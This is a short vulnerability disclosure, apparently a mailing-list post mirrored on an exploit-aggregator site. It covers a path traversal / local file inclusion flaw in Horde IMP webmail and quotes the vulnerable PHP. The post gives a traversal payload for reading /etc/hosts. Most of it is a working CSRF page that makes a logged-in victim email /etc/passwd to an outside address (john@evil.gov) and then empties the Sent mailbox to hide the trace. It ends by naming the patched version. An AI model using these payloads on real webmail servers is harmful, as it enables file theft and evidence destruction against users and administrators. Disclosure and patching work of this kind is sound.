Share
## https://sploitus.com/exploit?id=PACKETSTORM:225073
this is my first time sending to a mailing list so ive chosen
    something easy. here goes:
    
    Summary: Horde Groupware’s IMP Webmail solution contains a path
    traversal/local file inclusion vulnerability which could be exploited
    to escalate privileges or bypass authentication (through CSRF if
    unauthenticated).
    
    the vulnerability is in here:
    
    } elseif (strcasecmp($node->tagName, 'IMG') === 0) {
                    /* Check for smileys. They live in the JS directory, under
                     * the base ckeditor directory, so search for that and replace
                     * with the filesystem information if found (Request
                     * #13051). Need to ignore other image links that may have
                     * been explicitly added by the user. */
                    $js_path = strval(Horde::url($registry->get('jsuri',
    'horde'), true));
                    if (stripos($src, $js_path . '/ckeditor') === 0) {
                        $file = str_replace(
                            $js_path,
                            $registry->get('jsfs', 'horde'),
                            $src
                        );
    
                        if (is_readable($file)) {
                            $data_part = new Horde_Mime_Part();
                            $data_part->setContents(file_get_contents($file));
                          ...
    
    as seen, we control $file, which is just the src in <img src="">. to
    get past the checks to hit our file_get_contents sink, we can just
    satisfy the stripos check. our (elementary) exploit is thus:
    --
    <img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
    --
    this is likely very chainable with any other existing primitive to
    achieve rce on horde IMP. for example, heres an easy csrf chain:
    
    --
    <!DOCTYPE html>
    <html>
    
    <body>
        <h1>yo</h1>
        <script>
            var p1 = new FormData();
            p1.append('to', 'john@evil.gov');
            // land in spam
            p1.append('subject', 'hai');
            p1.append('html', '1');
            p1.append('message',
                '<html><body>bye<img
    src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
    
            p1.append('identity', '0');
            p1.append('priority', 'normal');
            p1.append('request_read_receipt', '0');
            p1.append('save_sent_mail', '1');
            fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
                    method: 'POST',
                    body: p1,
                    credentials: 'include',
                    mode: 'no-cors'
                })
                .then(() => {
                    console.log("* bye");
                    setTimeout(() => {
                        var p2 = new FormData();
                        p2.append('mbox', 'U0VOVA'); // b64 SENT
                        // delete
    
    fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
                            method: 'POST',
                            body: p2,
                            credentials: 'include',
                            mode: 'no-cors'
                        });
                    }, 2000);
                });
        </script>
    </body>
    
    </html>
    --
    
    PATCH:
    update to horde imp 7.0.1 for the patch.